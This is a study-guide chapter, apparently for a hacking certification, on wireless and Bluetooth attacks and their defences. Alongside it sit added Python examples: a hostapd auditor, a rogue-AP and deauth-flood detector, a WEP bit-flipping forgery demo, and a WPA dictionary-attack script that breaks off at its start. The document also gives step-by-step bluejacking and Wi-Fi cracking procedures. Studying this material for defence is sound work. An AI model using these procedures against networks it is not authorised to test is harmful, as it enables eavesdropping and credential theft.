Hotspotter is a wireless attack tool that sets up a rogue access point. It passively listens for probe requests in which Windows clients name the networks they have connected to before, and when a probed name matches one in its list it brings up an access point with that name, so the client associates and authenticates with the attacker's machine instead of the legitimate network. A deauthentication frame sent to the victim first causes the victim's wireless connection to switch to the attacker's, non-preferred, network.

Wireless Zero Configuration (WZC)
Wireless Zero Configuration (WZC), also known as Wireless Auto Configuration or WLAN AutoConfig, is a wireless connection management utility included with Microsoft Windows XP and later operating systems. It runs as a service that dynamically selects a wireless network to connect to on the basis of the user's preferences and various default settings.
It can be used instead of, or in the absence of, the wireless network utility supplied by the manufacturer of the computer's wireless adapter. The drivers for the wireless adapter answer the service's NDIS object identifier (OID) queries and pass the available network names to the service. WZC also introduced some security threats:
- WZC probes for networks the computer has connected to before, naming them in its probe requests. Anyone with a wireless analyzer can read these names and set up a fake access point with a matching SSID for the client to connect to.
- WZC attempts to connect to the wireless network with the strongest signal. An attacker can create a fake wireless network with a high-power antenna and cause computers to associate with the attacker's access point.

Airjack
Airjack is a collection of wireless card drivers and related programs. It includes monkey_jack, which automates a man-in-the-middle (MITM) attack. wlan_jack is a DoS tool in the Airjack set that accepts a target source address and BSSID and sends continuous deauthentication frames to a single client or to an entire network. Similarly, essid_jack sends a disassociation frame to a target client in order to force the client to reassociate with the network and thereby give up the network's SSID, which the client includes in its reassociation request even when the access point omits it from beacons.

Ettercap
Ettercap is a free, open-source tool for UNIX and Windows for network protocol analysis and security auditing. It can intercept traffic on a network segment, capture passwords, and conduct active eavesdropping against a number of common protocols. Ettercap supports active and passive dissection of many protocols (including encrypted ones, by interposing itself in the connection) and provides many features for network and host analysis.

AiroPeek
AiroPeek is a Windows-based commercial wireless LAN analyzer for IEEE 802.11b. It supports all the higher-level protocols such as TCP/IP, NetBEUI, and IPX.
It can be used to perform the following tasks: site surveys, security assessments, channel scanning, real-time and saved capture, WEP decryption, client troubleshooting, WLAN monitoring, remote WLAN analysis, and application-layer protocol analysis.

OpenBTS
OpenBTS is a software-based GSM access point that allows standard GSM-compatible mobile phones to make telephone calls without using an existing telecommunications provider's network. OpenBTS replaces the traditional GSM operator network switching subsystem from the Base Transceiver Station (BTS) upwards. Instead of forwarding call traffic to an operator's mobile switching centre (MSC), calls are terminated on the same box by handing the traffic to the Asterisk PBX via SIP and Voice over IP (VoIP).

Bit-flipping attack
A bit-flipping attack is an attack on a cryptographic cipher in which the attacker changes the ciphertext in such a way as to produce a predictable change in the plaintext, even though the attacker cannot read the plaintext itself. Stream ciphers such as the RC4 used by WEP are especially exposed: flipping a bit of the ciphertext flips exactly the same bit of the decrypted plaintext. Note that this type of attack is not directed against the cipher itself (as cryptanalysis would be) but against a particular message or series of messages. In the extreme, it can become a denial-of-service attack against all messages on a channel using that cipher. The attack is especially dangerous when the attacker knows the format of the message, because the attacker can then turn it into a similar message in which some important field is altered. For example, changing the destination address might alter the message route in a way that forces re-encryption with a weaker cipher, making the message easier for the attacker to decipher. WEP's integrity check value is a CRC-32, which is linear, so the attacker can also correct the encrypted integrity check to match the modified plaintext and the forged frame is accepted as valid.

15.4 Understand Bluetooth hacking, and understand how to defend against Bluetooth hacking
Exam Focus: Understand Bluetooth hacking, and understand how to defend against Bluetooth hacking. Objective includes:
- Understand Bluetooth hacking.
- Understand how to defend against Bluetooth hacking.

Bluetooth hacking
In Bluetooth hacking, vulnerabilities in Bluetooth stack implementations are exploited so that sensitive data on Bluetooth-enabled devices and networks can be compromised. Bluetooth-enabled electronic devices connect and communicate wirelessly via piconets, which are short-range, ad hoc networks.

Bluesmacking attack
In a Bluesmacking attack, the attacker uses the Logical Link Control and Adaptation Layer Protocol (L2CAP). The attacker creates a data packet (an L2CAP echo request, the Bluetooth "ping") larger than the size the target device can handle and sends it to the victim's device, which crashes or becomes unresponsive. It is the Bluetooth counterpart of the ping-of-death attack.

Bluesnarfing
In Bluesnarfing, an attacker steals information from a wireless device through a Bluetooth connection. The attacker connects to the OBEX Push target and issues an OBEX GET request for known filenames, such as 'telecom/pb.vcf' for the device's phone book or 'telecom/cal.vcs' for the device's calendar file, which a vulnerable implementation serves without requiring pairing.

Security issues while using Bluetooth
The following are security issues with Bluetooth:
- Short PINs are allowed, and a short PIN can be brute-forced easily.
- The length of the Bluetooth encryption key is negotiable, so it can be negotiated down to a weak value.
- A unit key (a link key that one device generates and uses as the link key with every other device) can be reused, and once it has been shared it is effectively public. It is usable only in a fully trusted environment, because every device that has paired with the unit-key device holds the same key and can impersonate or eavesdrop on any other device holding it.
- The master key of the piconet is shared among its members.
- An attacker who has communicated with a device that uses a unit key holds that key and can therefore eavesdrop on, or impersonate, that device in its later connections with other users.
- Only the device is authenticated, not the individual user, so anyone holding an authenticated device can use it.
- Only individual links are encrypted and authenticated; there is no end-to-end protection.
- Security services such as auditing and non-repudiation do not exist.
Bluejacking
Bluejacking is one of the most common Bluetooth attacks. In bluejacking, an attacker sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDAs and mobile phones. It abuses the OBEX object push feature (a contact card is pushed to the victim) and by itself gives no access to the victim's data.

Bluejack a victim
Take the following steps to bluejack a victim:
1. Choose an area with plenty of mobile users.
2. Create a new contact in your phone's address book.
3. Enter the message in the name field.
4. Save the new contact.
5. Select "Send via Bluetooth". This searches for any Bluetooth device within range.
6. Select one phone from the discovered list and send the contact.
7. You will see the message "card sent"; then listen for the message tone on your victim's phone.

Bluetooth stack
(The original figure of the Bluetooth protocol stack is not reproduced.)

The following are Bluetooth discovery modes:
- Discoverable: the device responds to all inquiries.
- Limited discoverable: the device is visible only for a certain period of time.
- Non-discoverable: the device never answers inquiry scans.
The following are pairing modes:
- Non-pairable mode: every pairing request is rejected.
- Pairable mode: the device will pair when requested.

Bluetooth threats
The following are Bluetooth threats:
- Leaking calendars and address books: a user's personal information can be stolen and used by an attacker for malicious purposes.
- Bugging devices: an attacker can instruct the phone to call another person, and can even record the conversation.
- Sending SMS messages: terrorists can use the phones of legitimate users to send false bomb threats to airlines.
- Causing financial losses: hackers can use a victim's phone to send many MMS messages or place international calls, resulting in a high phone bill.
- Remote control: hackers can remotely control a phone and make phone calls or connect to the Internet.
- Social engineering: attackers trick Bluetooth users into lowering security or disabling authentication for Bluetooth connections so that the attacker can pair with them and steal information.
- Malicious code: mobile phone worms can replicate and spread by exploiting Bluetooth connections.
- Protocol vulnerabilities: an attacker exploits Bluetooth pairing and communication protocols for the following purposes:
  o Stealing data
  o Making calls
  o Sending messages
  o Conducting DoS attacks on a device
  o Spying through the phone

Bluebug attack
In the Bluebug attack, an attacker exploits a flaw in the phone's Bluetooth implementation that exposes a serial (RFCOMM) channel without authentication, and through it gains unauthorized access to the phone's AT command interface. With this access an attacker can:
- Initiate phone calls.
- Send an SMS to any number.
- Read SMS messages from the phone.
- Read and write phonebook entries.
- Set call forwarding.
- Make an Internet connection.

Short pairing code attack
Pairing establishes a shared secret (the link key) between two devices that protects their later communication. In a short pairing code attack, the attacker forces a pair of Bluetooth devices to repeat the pairing process (for example by impersonating one of them and claiming to have lost the link key), eavesdrops on the new pairing exchange, and then brute-forces the short PIN offline to recover the link key.

BTKeylogging attack
In a BTKeylogging attack, the attacker uses a PIN-cracking attack to discover the fixed PIN code of the target Bluetooth keyboard. The attack is possible if the target keyboard has a fixed PIN code and the attacker knows its BD_ADDR. The attacker uses a protocol analyzer to intercept all the required information, derives the link key, and then decrypts the keyboard's traffic, turning the keyboard into a keylogger that reveals every keystroke.

BTVoiceBugging attack
In a BTVoiceBugging attack, the attacker knows the fixed PIN of the target headset. Using a protocol analyzer and the recovered link key, the attacker opens a two-way, real-time SCO/eSCO voice link with the headset and can listen to and inject audio. Like BTKeylogging, this attack is possible only when the attacker knows the fixed PIN of the target device.
BlueSpam attack
In a BlueSpam attack, the attacker discovers other Bluetooth-enabled devices and sends them files to spam them. The attack uses the OBEX protocol and can be carried out with any type of file, such as vCards (VCF), plain ASCII text files, image files, audio, and video files.

PhoneSnoop
PhoneSnoop is BlackBerry spyware. An attacker can use PhoneSnoop to remotely activate the microphone of a BlackBerry handheld and listen to sounds near it. When PhoneSnoop is used to conduct surveillance on an individual, it solely demonstrates the capabilities of the BlackBerry handheld: PhoneSnoop is purely a proof-of-concept application and does not have the stealth or spyware features that would make it malicious.

BlueScanner
BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows. It discovers the type of each Bluetooth device (phone, computer, keyboard, PDA) and the services the device advertises. It records all the information that can be collected from the device without attempting to authenticate with it.

Bluetooth hacking tools
The following are Bluetooth hacking tools: BH Bluejack, Bluesnarfer, Bluediving, Blooover, BTScanner, BTCrack, BTBrowser, and BTCrawler.

Defending against Bluetooth hacking
The following actions can be taken to defend against Bluetooth hacking:
- When pairing a device, use a long PIN with a non-regular pattern; avoid key combinations that are sequential on the keypad.
- Enable encryption when a Bluetooth connection is established to your PC.
- Review the list of paired devices from time to time and delete any paired device you are not sure about.
- Keep Bluetooth disabled; enable it only when required and disable it again as soon as the task is complete.
- Keep the device in non-discoverable (hidden) mode. Note that this only hides the device from inquiry scans; an attacker who already knows its BD_ADDR can still attempt to connect.
- Do not accept unknown or unexpected pairing requests.
Detecting and blocking rogue APs
Detecting rogue APs involves the following:
- RF scanning: repurposed access points (used only for packet capture and analysis) are plugged into the wired network at all locations; they detect wireless devices operating nearby and warn the WLAN administrator.
- AP scanning: access points that can detect neighboring APs operating nearby expose the data through their MIBs and web interfaces.
- Using wired-side input: network management software uses multiple protocols (SNMP queries, the switches' MAC address tables, and so on) to detect devices on the LAN and identify rogue APs plugged into it.
A BSSID seen in the air is a concern mainly when the device behind it is connected to the organization's wire, so the wireless-side observation should be correlated with the wired-side inventory before any blocking is done.

The following actions can be taken to block a rogue AP:
- Launch a denial-of-service attack (wireless containment, that is, spoofed deauthentication frames) against the rogue AP to deny access to new clients. This is what WIPS containment features do; use it only against devices confirmed to be yours or on your wire, since deauthenticating a neighbor's network is itself an attack.
- Block the switch port to which the AP is connected, or locate the AP manually and physically remove it from the LAN.

15.5 Understand how to defend against wireless attacks, and identify Wi-Fi security tools
Exam Focus: Understand how to defend against wireless attacks, and identify Wi-Fi security tools. Objective includes:
- Understand how to defend against wireless attacks.
- Identify Wi-Fi security tools.

Defending against wireless attacks
The following are Wi-Fi configuration best practices:
- Change the default SSID after configuring the WLAN.
- Set the router's administrative password and enable firewall protection.
- Disable SSID broadcasts. This is obscurity rather than protection: clients reveal a hidden SSID in their probe and association requests, as the SSID-recovery tools in this chapter show.
- Disable remote router login and wireless administration.
- Enable MAC address filtering on the access point or router. This is also weak on its own: an attacker can sniff an allowed address and clone it.
- Enable encryption on the access point and change the passphrase often.
The following are SSID best practices:
- Use SSID cloaking to stop the default wireless management messages from broadcasting the ID to everyone.
- Do not use your SSID, company name, network name, or any other easy-to-guess string in passphrases.
- Place a firewall or packet filter between the AP and the corporate intranet.
- Limit the transmit power of the wireless network so that it cannot be detected outside the bounds of your organization.
- Check the wireless devices regularly for configuration or setup problems.
- Add another layer of encryption for traffic, such as IPsec or a VPN over the wireless link, rather than relying on link-layer encryption alone.
The following are Wi-Fi authentication best practices:
- Choose WPA2 (or, at minimum, WPA) instead of WEP.
- Implement WPA2 Enterprise (802.1X with EAP) wherever possible.
- Disable the network when it is not needed.
- Place wireless access points in a secured location.
- Keep the drivers on all wireless equipment updated.
- Use a centralized server (RADIUS) for authentication.

Wi-Fi security auditing tools
The following are Wi-Fi security auditing tools:
- AirMagnet WiFi Analyzer: an industry-standard tool used for mobile auditing and troubleshooting of enterprise Wi-Fi networks. It helps IT staff solve end-user problems related to security threats and wireless network vulnerabilities. AirMagnet WiFi Analyzer has a full compliance reporting engine that automatically maps collected network information to the requirements of policy and industry regulations.
- AirDefense: a single UI-based platform for wireless monitoring, intrusion protection, automated threat mitigation, and more. It provides tools for:
  o Rogue detection
  o Policy enforcement
  o Intrusion prevention
  o Regulatory compliance
AirDefense uses distributed sensors operating in tandem with a hardened, purpose-built server appliance to monitor all 802.11 (a/b/g/n) wireless traffic in real time. To detect wireless attacks and anomalous behavior accurately, AirDefense analyzes existing and day-zero threats in real time against historical data. AirDefense can rewind and review detailed records of wireless activity.
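As an added example of the configuration best practices above (not code from the original page), the following script audits a hostapd configuration for the weak settings those practices warn against and shows a weak configuration beside a hardened one. Both configurations are constructed for the demo; the directive names are hostapd's own, while the 12-character passphrase threshold and the severity labels are this example's assumptions.

```python
WEAK_CONF = """\
# Constructed example of a weak hostapd.conf (not from the original page)
interface=wlan0
ssid=corpnet
hw_mode=g
channel=6
auth_algs=3
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=corpnet2024
ignore_broadcast_ssid=1
macaddr_acl=1
accept_mac_file=/etc/hostapd/accept.mac
"""

HARDENED_CONF = """\
# Constructed example of a hardened hostapd.conf: WPA2-Enterprise, CCMP only, 802.1X to RADIUS
interface=wlan0
ssid=corpnet
hw_mode=g
channel=6
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
auth_server_addr=10.0.0.10
auth_server_port=1812
auth_server_shared_secret=REPLACE_WITH_A_LONG_RANDOM_SECRET
"""


def parse_hostapd(text):
    """key=value lines; blank lines and '#' comments are ignored."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def audit_hostapd(text):
    """Return (severity, message) findings in the order the checks run; empty list = clean."""
    cfg = parse_hostapd(text)
    findings = []
    wpa = int(cfg.get("wpa", "0"))  # bit 0 = WPA (v1), bit 1 = WPA2 (RSN)
    key_mgmt = cfg.get("wpa_key_mgmt", "").split()
    ciphers = set((cfg.get("wpa_pairwise", "") + " " + cfg.get("rsn_pairwise", "")).split())
    passphrase = cfg.get("wpa_passphrase", "")
    ssid = cfg.get("ssid", "")

    if "wep_default_key" in cfg or any(k.startswith("wep_key") for k in cfg):
        findings.append(("critical", "WEP keys configured; WEP is broken and must not be used"))
    if wpa == 0:
        findings.append(("critical", "wpa=0: no WPA/WPA2 protection on this SSID"))
    if wpa & 1:
        findings.append(("high", "wpa=%d allows WPA (v1); set wpa=2 for WPA2 only" % wpa))
    if "TKIP" in ciphers:
        findings.append(("high", "TKIP pairwise cipher enabled; use CCMP only"))
    if int(cfg.get("auth_algs", "1")) & 2:  # bit 1 = shared-key authentication (WEP)
        findings.append(("high", "auth_algs enables shared-key (WEP) authentication"))
    if passphrase and ssid and ssid.lower() in passphrase.lower():
        findings.append(("high", "wpa_passphrase contains the SSID"))
    if passphrase and len(passphrase) < 12:  # threshold is an assumption of this example
        findings.append(("medium", "wpa_passphrase is shorter than 12 characters"))
    if "WPA-PSK" in key_mgmt:
        findings.append(("low", "pre-shared key in use; prefer WPA-EAP (802.1X) where possible"))
    if "WPA-EAP" in key_mgmt and cfg.get("ieee8021x") != "1":
        findings.append(("high", "WPA-EAP configured but ieee8021x=1 is missing"))
    if cfg.get("ignore_broadcast_ssid", "0") != "0":
        findings.append(("info", "hidden SSID: clients still reveal it in probe requests; not a control"))
    if cfg.get("macaddr_acl", "0") != "0":
        findings.append(("info", "MAC filtering: trivially bypassed by cloning an allowed address"))
    return findings


def worst_severity(findings):
    order = ["critical", "high", "medium", "low", "info"]
    return min((sev for sev, _ in findings), key=order.index, default="none")


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_hostapd(conf)
        print(f"{name}: worst={worst_severity(findings)}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```

The hidden-SSID and MAC-filter checks are reported as informational on purpose: the page recommends both, and they do no harm, but an auditor should not count them as encryption or authentication controls.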
This is useful in forensic investigations and for ensuring policy compliance.
- Adaptive Wireless IPS (WIPS): provides wireless network threat detection and mitigation against malicious attacks and security vulnerabilities. It can be used to detect, analyze, and identify wireless threats.

WIPS
A wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of unauthorized (rogue) access points and for the use of wireless attack tools. The system monitors the radio spectrum used by the wireless LANs and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally this is done by comparing the MAC addresses of the participating wireless devices against an authorized list. Rogue devices can, however, spoof the MAC address of an authorized network device, so a WIPS uses a fingerprinting approach to weed out devices with spoofed MAC addresses: it compares the unique signatures exhibited by the signals emitted by each wireless device (RF characteristics, timing, and protocol behavior) against the known signatures of the pre-authorized wireless devices.
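Added example (not code from the original page or from any WIPS product) of two detections a WIPS performs, serving both the rogue-AP detection discussion in the previous section and the WIPS description above. The first correlates BSSIDs seen in the air with an authorized list, the corporate SSIDs, and the switches' MAC (CAM) table to separate evil twins and rogue APs on the wire from harmless neighbors; the second flags a deauthentication flood by counting deauth/disassoc frames per BSSID in a sliding window. The authorized list, CAM table, observed networks, and frames are all constructed; the rule that an AP's wired MAC differs from its BSSID only in the last octet is a heuristic assumed for the example, and the ten-frames-per-second threshold is likewise an assumption.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10  # 802.11 management frame subtypes


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, dst, src, bssid, reason):
    """Constructed management frame: 24-byte MAC header followed by a 2-byte reason code."""
    fc = bytes([subtype << 4, 0])  # type 0 (management), subtype, no flags
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + struct.pack("<H", reason)


def parse_mgmt(frame):
    fc, = struct.unpack_from("<H", frame, 0)
    reason = struct.unpack_from("<H", frame, 24)[0] if len(frame) >= 26 else None
    return (fc >> 4) & 0xF, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), reason


def detect_deauth_floods(frames, window=1.0, threshold=10):
    """Alert once per BSSID that sources >= threshold deauth/disassoc frames within `window` s.

    `frames` is an iterable of (timestamp, raw_frame). A few deauths per hour is normal
    (idle timeouts, roaming); dozens per second from one BSSID is attack tooling.
    """
    recent, alerts, alerted = defaultdict(deque), [], set()
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        subtype, dst, _src, bssid, reason = parse_mgmt(raw)
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append((ts, dst, reason))
        while ts - q[0][0] > window:  # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "start": q[0][0],
                           "targets": sorted({d for _, d, _ in q}),
                           "reasons": sorted({r for _, _, r in q})})
    return alerts


def wired_neighbor(bssid, cam_table, spread=8):
    """Assumed heuristic: an AP's radio MAC usually differs from its wired MAC only in the last
    octet, so a CAM-table entry within `spread` of the BSSID suggests the AP is on our wire."""
    prefix, last = bssid[:-2], int(bssid[-2:], 16)
    for mac, port in cam_table.items():
        if mac[:-2] == prefix and abs(int(mac[-2:], 16) - last) <= spread:
            return mac, port
    return None


def find_rogue_aps(observed, authorized, corp_ssids, cam_table):
    """Classify each BSSID seen in the air that is not on the authorized list."""
    alerts = []
    for ap in observed:
        if ap["bssid"] in authorized:
            continue
        hit = wired_neighbor(ap["bssid"], cam_table)
        if ap["ssid"] in corp_ssids:
            kind = "evil-twin: corporate SSID from an unknown BSSID"
        elif hit:
            kind = f"rogue AP on the wired LAN: sibling MAC {hit[0]} on switch port {hit[1]}"
        else:
            kind = "unknown neighbor AP: outside scope unless it appears on our wire"
        alerts.append({"bssid": ap["bssid"], "ssid": ap["ssid"], "kind": kind})
    return alerts


# Constructed inventory and observations.
AUTHORIZED = {"00:aa:bb:cc:dd:ee"}
CORP_SSIDS = {"corpnet"}
CAM_TABLE = {"00:de:ad:be:ef:0a": "Gi1/0/7", "00:11:22:33:44:55": "Gi1/0/2"}
OBSERVED = [
    {"bssid": "00:aa:bb:cc:dd:ee", "ssid": "corpnet"},        # our AP
    {"bssid": "00:c0:ff:ee:00:01", "ssid": "corpnet"},        # evil twin
    {"bssid": "00:de:ad:be:ef:0b", "ssid": "linksys"},        # employee AP plugged into the LAN
    {"bssid": "00:12:34:56:78:9a", "ssid": "neighbor-cafe"},  # next door
]

OUR_AP = bytes.fromhex("00aabbccddee")
CLIENT = bytes.fromhex("1c1b2d000001")
# One inactivity deauth (reason 4) at t=5 s, then 40 broadcast deauths (reason 7) in 0.4 s
# with the attacker spoofing our AP's address as source and BSSID.
FRAMES = [(5.0, build_mgmt(DEAUTH, CLIENT, OUR_AP, OUR_AP, 4))]
FRAMES += [(60.0 + i * 0.01, build_mgmt(DEAUTH, b"\xff" * 6, OUR_AP, OUR_AP, 7)) for i in range(40)]


if __name__ == "__main__":
    for alert in find_rogue_aps(OBSERVED, AUTHORIZED, CORP_SSIDS, CAM_TABLE) + detect_deauth_floods(FRAMES):
        print(alert)
```

Note that the flood detector keys on the BSSID claimed in the frame, which is exactly what the attacker spoofs; it tells you that someone is deauthenticating your clients in your AP's name, not which radio did it. Attributing the frames to a physical transmitter is where the signal fingerprinting described above comes in.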
Wi-Fi intrusion prevention systems
The following are Wi-Fi intrusion prevention systems: SonicWall Wireless Networking, Network Box IDP, TippingPoint IPS, 3Com AirProtect, Newbury RF Firewall, AirMobile Server, SpectraGuard Enterprise, and WLS Manager.

Wi-Fi predictive planning tools
The following are Wi-Fi predictive planning tools: AirMagnet Planner, Networks RingMaster, Control System Planning Tool, Spot Predictive Site Survey, SpectraGuard Planner, Site Survey Professional, LAN Planner, and Wi-Fi Planner.

Wi-Fi vulnerability scanning tools
The following are Wi-Fi vulnerability scanning tools: Karma, FastTrack, Zenmap, WiFiDEnum, Nessus, WiFiZoo, and OSWA Security Assessment Toolkit.

EAP-TLS protocol
Extensible Authentication Protocol-Transport Layer Security (EAP-TLS) is an authentication protocol that provides mutual authentication, integrity-protected cipher suite negotiation, and key exchange between two systems using public key cryptography. EAP-TLS works on a network configured for a Public Key Infrastructure (PKI) and uses certificates for authentication: the authentication server presents its certificate to the client and the client presents its own certificate to the server, so there is no password to phish or crack. Client certificates can be stored on computers or on smart cards.

15.6 Examine Wireless Penetration Testing Framework
Exam Focus: Examine Wireless Penetration Testing Framework. Objective includes:
- Understand wireless penetration testing.
- Examine the wireless penetration testing framework.

Wireless penetration testing
Wireless penetration testing actively evaluates the information security measures implemented in a wireless network. It is used to analyze design weaknesses, technical flaws, and vulnerabilities. It is required for the following reasons:
- Threat assessment: the wireless threats faced by an organization's information assets are identified.
- Upgrading infrastructure: the existing software, hardware, or network design is changed or upgraded.
- Risk prevention and response: a comprehensive set of preparatory steps for preventing upcoming exploitation is provided.
- Security control auditing: the efficiency of wireless security protections and controls is tested and evaluated.
- Data theft detection: streams of sensitive data are found by sniffing the traffic.
- Information system management: information on security protocols, network strength, and connected devices is collected.
In wireless penetration testing, a penetration tester takes the following steps:
1. Wireless discovery
2. Packet capturing
3. Attacking WEP/WPA passwords
4. Generating frames using frame-generation software
5. Using IDS tools

Wireless penetration testing framework
The wireless penetration testing framework includes the following steps:
1. Discover wireless devices. If a wireless device is found, document all findings.
2. If the device is on a Wi-Fi network, perform the general Wi-Fi network attack and check whether the WLAN uses WEP encryption.
3. If the WLAN uses WEP, perform WEP encryption pen testing; otherwise check whether it uses WPA/WPA2.
4. If the WLAN uses WPA/WPA2, perform WPA/WPA2 encryption pen testing; otherwise check whether it uses LEAP.
5. If the WLAN uses LEAP, perform LEAP pen testing; otherwise check whether the WLAN is unencrypted.
6. If the WLAN is unencrypted, perform unencrypted-WLAN pen testing; otherwise perform the general Wi-Fi network attack.

General penetration steps for all wireless networks
The following are the general penetration steps for all wireless networks:
1. Create a rogue access point. Use tools such as Karma, Hotspotter, or Airsnarf to deauthenticate the client, then check whether the client is deauthenticated.
2. If the client is deauthenticated:
   1. Let the client associate with the rogue access point.
   2. Sniff the traffic.
   3. Check whether a passphrase or certificate has been acquired; if not, deauthenticate the client again.
3. If a passphrase is acquired, use it to join the network and steal confidential information (on a compromised Windows client, the wzcook tool dumps the WEP/WPA keys stored by Wireless Zero Configuration rather than cracking them); otherwise deauthenticate the client again.
Pen testing a LEAP-encrypted WLAN
Pen testing a LEAP-encrypted WLAN includes the following steps:
1. Use tools such as Karma, Hotspotter, or Airsnarf to deauthenticate the client.
2. If the client is deauthenticated, capture the LEAP challenge and response and use tools such as asleap or THC-LEAP Cracker to break the LEAP authentication (an offline dictionary attack against the captured exchange) and steal confidential information; otherwise deauthenticate the client again.

Pen testing a WPA/WPA2-encrypted WLAN
Pen testing a WPA/WPA2-encrypted WLAN includes the following steps:
1. Use tools such as Karma, Hotspotter, or Airsnarf to deauthenticate the client (aireplay-ng --deauth does the same).
2. If the client is deauthenticated:
   1. Sniff the traffic.
   2. Check whether the EAPOL four-way handshake has been captured; if not, deauthenticate the client again.
3. If the EAPOL handshake is captured, use tools such as coWPAtty or Aircrack-ng to run a WPA/WPA2-PSK dictionary attack against it and steal confidential information; otherwise deauthenticate the client again. A dictionary attack succeeds only if the passphrase is in the wordlist, and WPA2 Enterprise (802.1X) networks have no pre-shared key to crack this way.

Pen testing a WEP-encrypted WLAN
Pen testing a WEP-encrypted WLAN includes the following steps:
1. Check whether the SSID is visible or hidden.
2. If the SSID is visible, sniff the traffic and check the status of packet capturing.
3. If enough packets have been captured (or injected with aireplay-ng to speed up the collection of IVs), use tools such as Aircrack-ng, AirSnort, or WEPCrack to break the WEP key; otherwise keep sniffing.
4. If the SSID is hidden:
   1. Use tools such as Aireplay-ng, CommView, or Void11 to deauthenticate a client.
   2. Capture the SSID from the client's reassociation.
   3. Follow the procedure for a visible SSID.

Pen testing an unencrypted WLAN
Pen testing an unencrypted WLAN includes the following steps:
1. Check whether the SSID is visible or hidden.
2. If the SSID is visible, sniff for the IP range and check whether MAC filtering is enabled.
3. If MAC filtering is enabled, use tools such as SMAC to spoof the MAC address of a client that is already allowed, or use an IP address within the discovered range, to connect to the AP.
4. If the SSID is hidden, use tools such as Aireplay-ng to discover the SSID and follow the procedure for a visible SSID.
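Added example, not code from the original page: the bit-flipping attack from section 15.3 applied to a WEP-style frame, which is the weakness behind the injection step of the WEP procedure above (the chopchop attack in aireplay-ng exploits the same CRC-32 linearity). WEP seals a frame by appending a CRC-32 integrity check value (ICV) and XORing the result with an RC4 keystream. Because a ciphertext bit flip passes straight through XOR to the plaintext, and CRC-32 is linear, an attacker who knows only the message layout can change a field and patch the encrypted ICV so the receiver accepts the forgery. The keystream below is a fixed byte pattern standing in for RC4 output, and the message format is invented for the demo; the attacker-side functions never read the plaintext or the keystream.

```python
import zlib

# Stand-in for the RC4 keystream WEP derives from (IV, key); any byte pattern works because
# the attacker never needs it. A fixed pattern keeps the demo deterministic.
KEYSTREAM = bytes((37 * i + 11) & 0xFF for i in range(128))


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_like_encrypt(plaintext, keystream=KEYSTREAM):
    """WEP-style sealing: append the CRC-32 ICV (little-endian), XOR everything with the keystream."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return xor(plaintext + icv, keystream)


def wep_like_decrypt(ciphertext, keystream=KEYSTREAM):
    """Remove the keystream and report whether the ICV still matches the plaintext."""
    body = xor(ciphertext, keystream)
    plaintext, icv = body[:-4], body[-4:]
    return plaintext, zlib.crc32(plaintext).to_bytes(4, "little") == icv


def flip_bits(ciphertext, delta):
    """Push a plaintext XOR difference `delta` through the ciphertext and patch the encrypted ICV.

    CRC-32 is affine over GF(2): crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros(len(p))). The ICV
    correction therefore depends only on `delta`, not on the plaintext or the keystream.
    """
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))).to_bytes(4, "little")
    return xor(ciphertext, delta + icv_delta)


def naive_flip(ciphertext, delta):
    """Same plaintext change, but the encrypted ICV is left alone: the receiver rejects the frame."""
    return xor(ciphertext, delta + bytes(4))


# Constructed message format: the attacker knows the layout (destination field at a fixed
# offset) but not the contents hidden by the cipher.
ORIGINAL = b"DST=10.0.0.5;CMD=PING"
DST_LAST_DIGIT_OFFSET = 11  # position of the '5' in the destination field


def demo(keystream=KEYSTREAM):
    """Returns ((plaintext, icv_ok) after a patched flip, (plaintext, icv_ok) after a naive flip)."""
    ciphertext = wep_like_encrypt(ORIGINAL, keystream)
    # The attacker builds delta from the ciphertext length and the field layout alone:
    # flip the bits that turn '5' into '9' in the last digit of the destination.
    delta = bytearray(len(ciphertext) - 4)
    delta[DST_LAST_DIGIT_OFFSET] = ord("5") ^ ord("9")
    delta = bytes(delta)
    return (wep_like_decrypt(flip_bits(ciphertext, delta), keystream),
            wep_like_decrypt(naive_flip(ciphertext, delta), keystream))


if __name__ == "__main__":
    (forged, forged_ok), (broken, broken_ok) = demo()
    print(forged, forged_ok)   # b'DST=10.0.0.9;CMD=PING' True
    print(broken, broken_ok)   # b'DST=10.0.0.9;CMD=PING' False
```

The fix WPA introduced is a keyed message integrity code (Michael under TKIP, then the CCMP MIC) in place of the CRC: with a keyed MIC the attacker cannot compute the correction term, so the same bit flip is detected.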
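Added example, not code from the original page or from coWPAtty or Aircrack-ng, of what those tools do in step 3 of the WPA/WPA2 procedure above: a dictionary attack against a captured four-way handshake. The script first constructs its own handshake (SSID, MAC addresses, nonces, and an EAPOL-Key message 2 carrying a valid MIC) from a passphrase of its choosing, standing in for a capture, then recovers the passphrase from a small wordlist by deriving PMK, PTK, and KCK per candidate and comparing the MIC. The key derivations are the standard 802.11i ones (PBKDF2-HMAC-SHA1 with 4096 iterations, PRF-512, and an HMAC-SHA1 MIC for key descriptor version 2); the SSID, addresses, and wordlist are invented.

```python
import hashlib
import hmac

# EAPOL-Key MIC offset: EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
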